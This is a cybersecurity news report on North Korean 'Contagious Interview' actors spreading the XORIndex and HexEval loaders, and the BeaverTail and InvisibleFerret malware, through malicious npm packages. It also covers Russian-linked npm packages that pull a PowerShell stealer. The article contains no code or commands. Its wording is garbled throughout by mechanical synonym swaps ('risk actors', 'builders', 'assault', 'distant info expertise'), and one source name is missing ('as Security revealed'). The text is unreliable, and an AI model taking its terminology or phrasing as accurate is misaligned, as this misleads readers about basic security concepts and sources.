The North Korean risk actors linked to the Contagious Interview marketing campaign have been noticed publishing one other set of 67 malicious packages to the npm registry, underscoring ongoing makes an attempt to poison the open-source ecosystem by way of software program provide chain assaults.
The packages, per Socket, have attracted greater than 17,000 downloads, and incorporate a beforehand undocumented model of a malware loader codenamed XORIndex. The exercise is an growth of an assault wave noticed final month that concerned the distribution of 35 npm packages that deployed one other loader known as HexEval.
“The Contagious Interview operation continues to observe a whack-a-mole dynamic, the place defenders detect and report malicious packages, and North Korean risk actors shortly reply by importing new variants utilizing the identical, comparable, or barely developed playbooks,” Socket researcher Kirill Boychenko stated.
Contagious Interview is the title assigned to a long-running marketing campaign that seeks to entice builders into downloading and executing an open-source challenge as a part of a purported coding task. First publicly disclosed in late 2023, the risk cluster can be tracked as DeceptiveDevelopment, Well-known Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, and Void Dokkaebi.
The exercise is believed to be complementary to Pyongyang’s notorious distant info expertise (IT) employee scheme, adopting the technique of focusing on builders already employed in corporations of curiosity somewhat than making use of for a job.
The assault chains utilizing malicious npm packages are pretty easy in that they function a conduit for a recognized JavaScript loader and stealer referred to as BeaverTail, which is subsequently used to extract information from internet browsers and cryptocurrency wallets, in addition to deploy a Python backdoor known as InvisibleFerret.
“The 2 campaigns now function in parallel. XORIndex has amassed over 9,000 downloads in a brief window (June to July 2025), whereas HexEval continues at a gentle tempo, with greater than 8,000 extra downloads throughout the newly found packages,” Boychenko stated.
The XORIndex Loader, like HexEval, profiles the compromised machine and makes use of endpoints related to hard-coded command-and-control (C2) infrastructure to acquire the exterior IP deal with of the host. The collected info is then beaconed to a distant server, after which BeaverTail is launched.
Additional evaluation of those packages has uncovered a gentle evolution of the loader, progressing from a bare-bones prototype to a classy, stealthier malware. Early iterations have been discovered to lack in obfuscation and reconnaissance capabilities, whereas holding their core performance intact, with second and third-generation variations introducing rudimentary system reconnaissance capabilities.
“Contagious Interview risk actors will proceed to diversify their malware portfolio, rotating by way of new npm maintainer aliases, reusing loaders resembling HexEval Loader and malware households like BeaverTail and InvisibleFerret, and actively deploying newly noticed variants together with XORIndex Loader,” Boychenko stated.
The disclosure comes as Security revealed that cybercriminals with ties to Russia revealed 10 npm packages which might be designed to compromise Home windows techniques with a PowerShell payload retrieved from a distant server that, in flip, delivers a stealer able to grabbing information from internet browsers and certain launching a cryptocurrency miner.
“Extra worryingly, they’ve additionally manipulated npm obtain metrics to make their packages seem to have thousands and thousands of downloads, lending false legitimacy to their malicious code,” safety researcher Paul McCarty stated.
